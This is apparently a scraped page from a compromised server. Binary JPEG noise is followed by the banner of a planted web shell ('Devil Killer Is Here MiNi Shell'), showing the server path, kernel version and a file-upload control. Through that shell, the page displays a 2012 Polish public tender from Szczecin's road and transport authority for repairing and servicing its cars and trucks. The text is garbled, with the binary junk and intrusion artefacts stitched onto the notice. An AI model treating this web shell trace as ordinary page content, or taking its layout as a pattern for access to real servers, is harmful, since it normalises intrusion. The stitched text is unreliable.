JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/459784-N-2012.html

<p class="kh_header"><b>Szczecin: Naprawy, konserwacje, przeglądy techniczne samochodów osobowych i samochodów ciężarowych ZDiTM w Szczecinie</b><br>
<b>Numer ogłoszenia: 459784 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 91 4800444,4800434, faks 91 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawy, konserwacje, przeglądy techniczne samochodów osobowych i samochodów ciężarowych ZDiTM w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa serwisowania i naprawa samochodów służbowych ZDiTM w Szczecinie w zakresie wykonywania czynności pogwarancyjnych, przeglądów technicznych okresowych oraz wymiany uszkodzonych części zamiennych oraz usuwania uszkodzeń pojazdów  wynikających z bieżącej eksploatacji pojazdu, zagrażających bezpieczeństwu użytkownika, których konieczność wykonania stwierdzono w trakcie przeglądu lub naprawy.
2. Warunki realizacji zamówienia. Dotyczy I i II części zamówienia :
1) Zakres naprawy pojazdów będzie obejmował min. następujące czynności - układy:
a)	diagnostyka komputerowa silnika i jego układów;
b)	diagnostyka poduszek i kurtyn powietrznych;
c)	naprawa instalacji elektrycznej pojazdu wraz z podzespołami, regulacje;
d)	naprawa układu kierowniczego;
e)	naprawa układu hamulcowego;
f)	naprawa silnika i jego osprzętu;
g)	naprawa układu zasilania paliwem i powietrzem;
h)	naprawa układu przeniesienia mocy;
i)	naprawa zawieszenia pojazdu (określenie stopnia zużycia amortyzatorów);
j)	naprawa klimatyzacji;
k)	wymiana klamek, zawiasów, szyb, rolek przesuwnych drzwi;
l)	diagnostyka pojazdu bez przeprowadzenia remontu;
m)	wykonywanie okresowych przeglądów technicznych.
2) Naprawa pojazdów w zakresie określonym odpowiednio dla każdej części Zamówienia zostanie wykonana zgodnie z warunkami technicznymi przewidzianymi przez producenta dla danej marki pojazdu. Naprawy są naprawami awaryjnymi, nie planowanymi i wynikającymi z różnych aspektów użytkowania pojazdów, nie jest możliwe określenie ich częstotliwości i rodzaju - grupy uszkodzeń (awarii) i jako takie mają charakter szacunkowy, nie stanowią zobowiązania dla Zamawiającego do jego pełnej realizacji i jako takie nie mogą być podstawą do dochodzenia przez Wykonawcę jakichkolwiek roszczeń dotyczących niezrealizowania całości przedmiotu zamówienia.
3)Usługi przeglądu technicznego okresowego i naprawy wykonywane będą na podstawie  każdorazowego zlecenia składanego przez upoważnionego pracownika Zamawiającego.
4) Wykonawca zapewnia prawidłowość wykonania przedmiotu umowy zgodnie z dokumentacją techniczną sporządzoną przez producenta, a także zobowiązany będzie wykonać usługi będące przedmiotem umowy przy pomocy wykwalifikowanych pracowników oraz stosować fabrycznie nowe, oryginalne części lub zamienniki o parametrach nie gorszych niż producenta, posiadające cechy określone w PN zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. Nr 32, poz. 262 z późn. zm.), a także wymagane prawem europejskim świadectwa jakości i certyfikaty, w tym bezpieczeństwa.
5)W przypadku, gdy Wykonawca powierzy wykonanie przedmiotu umowy bądź jego części podwykonawcom, odpowiadać będzie za działanie bądź zaniechanie działania tych osób jak za swoje własne, a wszelkie rozliczenia między Wykonawcą a Podwykonawcą będą odbywały się bez udziału Zamawiającego.
6)Zamawiający może odmówić przyjęcia usługi, której zewnętrzne cechy wskazywać będą na jej nieodpowiednią jakość.
7)W przypadku przeglądów okresowych zakres wykonanych prac musi być zgodny z wykazem czynności wyszczególnionych w książce pojazdu, stosownie do jego przebiegu.
8)Wykonawca udziela gwarancji na części (z wyłączeniem przynależnych do grupy jednorazowego użytku) oraz na jakość dokonywanych czynności wchodzących w zakres  przeglądów technicznych i napraw, której bieg rozpoczyna się od dnia odbioru samochodu z naprawy lub przeglądu. Czynność ta będzie potwierdzona protokołem odbioru podpisanym przez obie strony.
9)Wymagany przez Zamawiającego minimalny okres gwarancji :
a)	na robociznę - min. 3 miesiące od dnia odbioru pojazdu,
b)	na zainstalowane części - okres gwarancji dla nowych części odpowiada okresom gwarancji określonym przez producenta, jednak okres ten nie może być krótszy niż 6 miesięcy od daty ich  montażu,
10)Wykonawca zobowiązany jest do prowadzenia książki przeglądów technicznych okresowych dla każdego pojazdu oddzielnie.
11)Wykonawca zapewnia holowanie z miejsca awarii na terenie miasta Szczecina do warsztatu :
a)	w okresie gwarancyjnym na własny koszt i własne ryzyko,
b)	w okresie pogwarancyjnym - na koszt Zamawiającego.
12)Wykonawca najpóźniej do dnia podpisania umowy winien dostarczyć normy czasu naprawy  
samochodów określający normy czasochłonności dla usług serwisu i naprawy pojazdów.
13)Wykonawca najpóźniej do dnia podpisania umowy winien dostarczyć podpisaną kserokopię  umowy na utylizację olejów i filtrów.
14)Wykonawca najpóźniej do dnia podpisania umowy winien dostarczyć podpisaną kserokopię umowy na neutralizację akumulatorów oraz ogumienia lub oświadczenie że akumulatory i ogumienie odbierane są przez dostawcę, który przy dostawie nowych zabiera zużyte.
15)Cena usługi zostanie określona w oparciu o koszt robocizny, (określony na podstawie wskazanej przez Wykonawcę w ofercie ceny za 1 roboczogodzinę i czasochłonności wykonania usługi) oraz koszt materiałów (części) użytych do wykonania usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-0, 50.11.40.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki dotyczące dysponowaniaosobami zdolnymi do wykonania zamówienia, poprzez wykazanie, że dysponują :

W Części I oraz Części II zamówienia:
 
-  co najmniej 1 osobą posiadającą uprawnienia diagnosty zgodnie Rozporządzeniem Ministra Infrastruktury z dnia 4 listopada 2004 r. w sprawie szczegółowych wymagań w stosunku do diagnostów (Dz.U.Nr 246 poz. 2469 ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie precyzuje spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	dla Części I :
a)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, iż najpóźniej na dzień podpisania umowy Wykonawca będzie dysponował w celu realizacji zamówienia co najmniej jedną stacją obsługi (warsztatem samochodowym) zlokalizowaną w odległości nie większej niż 10 km od siedziby Zamawiającego,  wyposażoną w:
- stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia,
- stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego,
- co najmniej 2 kanały obsługowe.
       Stacja obsługi (warsztat) winien być otwarty:
- od poniedziałku do piątku w godzinach od 07.00 - 21.00,
- w soboty w godzinach 08.00 - 14.00.
      W przypadku składania oferty wspólnej należy złożyć jeden dokument.
b)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, iż najpóźniej na dzień podpisania umowy Wykonawca będzie dysponował w celu realizacji zamówienia w miejscu świadczenia napraw i obsługi pojazdów stacją diagnostyczną o wyposażeniu zgodnym  z obowiązującymi przepisami. Stacja kontroli pojazdów, którą dysponuje Wykonawca winna spełniać wymagania określone w Rozporządzeniu Ministra Transportu i Budownictwa z 10.02.2006r. w sprawie szczegółowych wymagań w stosunku do stacji przeprowadzających badania techniczne pojazdów (Dz.U.Nr.40, poz. 275 ) w zw. z art. 84a. ust.1 ustawy Prawo o ruchu drogowym. 
Jeżeli Wykonawca nie posiada w miejscu świadczenia napraw i obsługi pojazdów stacji przeprowadzającej badania techniczne pojazdów, winien przedstawić pisemne zobowiązanie innego podmiotu w zakresie świadczenia usług w tym zakresie na rzecz Zamawiającego tj. że Wykonawca dysponuje tymi zasobami w celu należytej realizacji przedmiotowego zamówienia. Stacja przeprowadzająca badania techniczne pojazdów winna być zlokalizowana w odległości nie większej niż 2 km od warsztatu/stacji obsługi Wykonawcy.
W przypadku składania oferty wspólnej należy złożyć jeden dokument
5)	dla Części II :
c)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, iż najpóźniej na dzień podpisania umowy Wykonawca będzie dysponował w celu realizacji zamówienia co najmniej jedną stacją obsługi (warsztatem samochodowym) zlokalizowaną w odległości nie większej niż 10 km od siedziby Zamawiającego,  wyposażoną w:
a)	w wyposażoną w:
- stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia,
-stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego,
-co najmniej 1 kanał obsługowy.
       Stacja obsługi (warsztat) winien być otwarty:
-od poniedziałku do piątku w godzinach od 07.00 - 21.00,
-w soboty w godzinach 08.00 - 14.00.
b)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, iż najpóźniej na dzień podpisania umowy Wykonawca będzie dysponował w celu realizacji zamówienia w miejscu świadczenia napraw i obsługi pojazdów stacją diagnostyczną o wyposażeniu zgodnym  z obowiązującymi przepisami. Stacja kontroli pojazdów, którą dysponuje Wykonawca winna spełniać wymagania określone w Rozporządzeniu Ministra Transportu i Budownictwa z 10.02.2006r. w sprawie szczegółowych wymagań w stosunku do stacji przeprowadzających badania techniczne pojazdów (Dz.U.Nr.40, poz. 275 ) w zw. z art. 84a. ust.1 ustawy Prawo o ruchu drogowym. 
Jeżeli Wykonawca nie posiada w miejscu świadczenia napraw i obsługi pojazdów stacji przeprowadzającej badania techniczne pojazdów, winien przedstawić pisemne zobowiązanie innego podmiotu w zakresie świadczenia usług w tym zakresie na rzecz Zamawiającego tj. że Wykonawca dysponuje tymi zasobami w celu należytej realizacji przedmiotowego zamówienia. Stacja przeprowadzająca badania techniczne pojazdów winna być zlokalizowana w odległości nie większej niż 2 km od warsztatu/stacji obsługi Wykonawcy.
 W przypadku składania oferty wspólnej należy złożyć jeden dokument.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zmiana postanowień niniejszej umowy może nastąpić wyłącznie w sytuacji, gdy:
1)	wystąpi konieczność zmiany siedziby, NIP, REGON,
2)	wystąpi okoliczność niezależna od Wykonawcy (np. sprowadzenie części), które nie pozwalają na dotrzymanie terminu o którym mowa w § 3 pkt 5 niniejszej umowy.
3)	wystąpi konieczność zmiany konta bankowego Wykonawcy,
4)	wystąpi ustawowa zmiana stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego w Szczecinie, ul. Klonowica 5, pokój 318, III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 08:30, miejsce: Zarząd Dróg i Transportu Miejskiego w Szczecinie, ul. Klonowica 5, sekretariat Dyrektora, III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia  :  samochody osobowe - 20 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Marka pojazdu	Nr rejestracyjny	Pojemność	Paliwo	Rok produkcji
1	HYUNDAI GETZ	ZS 7908 M	1.1	Pb	2008
2	FIAT PANDA	ZS 79210	1.1	Pb	2003
3.	FIAT PANDA 	ZS 99616	1.1	Pb	2004
4	KIA CEED	ZS 6820M	1.6	Pb	2008
5	FIAT DOBLO CARGO	ZS 9726N	1.3	ON	2008
6	FIAT DOBLO CARGO	ZS 7325N	1.4	Pb	2008
7	FIAT ALBEA	ZS 99603	1.2	Pb	2004
8	DAEWOO LANOS	ZS 15334	1.5	Pb	2000
9	FIAT PANDA	ZS 99602	1.1	Pb	2004
10	HYUNDAI GETZ	ZS 9709L	1.1	Pb	2008
11	FIAT PANDA	ZS 79211	1.1	Pb	2003
12	FIAT PANDA	ZS 79212	1.1	Pb	2003
13	FIAT PANDA	ZS 79213	1.1	Pb	2003
14	FIAT PANDA	ZS 99614	1.1	Pb	2004
15	FIAT PANDA	ZS 99615	1.1	Pb	2004
16	FIAT PANDA	ZS 99617	1.1	Pb	2004
17	FIAT PANDA	ZS 5318T	1.1	Pb	2010
18	FIAT PANDA	ZS 9022N	1.1	Pb	2008
19	FIAT ALBEA	ZS 79205	1.2	Pb	2003
20	FIAT DOBLO	ZS 99619	1.2	Pb	2004

1)	Kod CPV : 50.11.20.00 - Usługi w zakresie napraw i konserwacji samochodów.
2)	Wykonawca winien wykonywać usługi będące przedmiotem zamówienia w terminie nie  dłuższym niż 3 dni robocze od daty przekazania pojazdu.
3)	Wykonawca winien dysponować lub będzie dysponował w celu realizacji zamówienia co najmniej jedną stacją obsługi (warsztatem samochodowym) zlokalizowaną w odległości nie większej niż 10 km od siedziby Zamawiającego,  wyposażoną w:
- stanowisko diagnostyczne do sprawdzania układu hamulcowego, kierowniczego, oświetlenia oraz zawieszenia,
- stanowisko do wykonania diagnostyki komputerowej silnika oraz układu elektronicznego,
- co najmniej 2 kanały obsługowe.
    Stacja obsługi (warsztat) winien być otwarty:
- od poniedziałku do piątku w godzinach od 07.00 - 21.00,
- w soboty w godzinach 08.00 - 14.00.
4)	Jednocześnie Wykonawca winien dysponować w miejscu świadczenia napraw i obsługi pojazdów stacją diagnostyczną o wyposażeniu zgodnym  z obowiązującymi przepisami. W tym zakresie Wykonawca winien dysponować co najmniej 1 osobą posiadającą uprawnienia diagnosty zgodnie Rozporządzeniem Ministra Infrastruktury z dnia 4 listopada 2004 r. w sprawie szczegółowych wymagań w stosunku do diagnostów (Dz.U.Nr 246 poz. 2469 ze zm.). Stacja kontroli pojazdów, którą dysponuje Wykonawca winna spełniać wymagania określone w Rozporządzeniu Ministra Transportu i Budownictwa z 10.02.2006r. w sprawie szczegółowych wymagań w stosunku do stacji przeprowadzających badania techniczne pojazdów (Dz.U.Nr.40, poz. 275 ) w zw. z art. 84a. ust.1 ustawy Prawo o ruchu drogowym. 
     Jeżeli Wykonawca nie posiada w miejscu świadczenia napraw i obsługi pojazdów stacji przeprowadzającej badania techniczne pojazdów winien przedstawić pisemne zobowiązanie innego podmiotu w zakresie świadczenia usług w tym zakresie na rzecz Zamawiającego tj. że Wykonawca dysponuje tymi zasobami w celu należytej realizacji przedmiotowego zamówienia. Stacja przeprowadzająca badania techniczne pojazdów winna być zlokalizowana w odległości nie większej niż 2 km od warsztatu/stacji obsługi Wykonawcy.
5)	Zamawiający wymaga aby pojazdy oczekujące na naprawę były przechowywane na terenie:
a)	 ogrodzonym, o utwardzonej nawierzchni (poprzez utwardzenie należy rozumieć: wyasfaltowanie, kostka brukowa wybetonowanie, wysypanie żwirem, tłuczniem, itp.),
b)   strzeżonym całodobowo lub monitorowanym za pomocą kamer z możliwością rejestracji zapisu oraz oświetlonym, gwarantującym nienaruszalność pojazdów dla osób postronnych,
c)   powierzchni umożliwiającej jednoczesne przechowanie min.2 pojazdów.
6)   Wykonawca umożliwi Zamawiającemu wgląd do pomieszczeń w celu weryfikacji ww. wymagań w zakresie wymaganego wyposażenia jakie posiada Wykonawca w miejscu wykonywania usług będących przedmiotem zamówienia. Wykonawca, który uniemożliwi Zamawiającemu zweryfikowanie ww. wymagań naruszy SIWZ i na podstawie art. 89 ust.1 pkt 2) ustawy PZP jego oferta zostanie odrzucona..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia : samochody ciężarowe - 4 sztuki.</p>
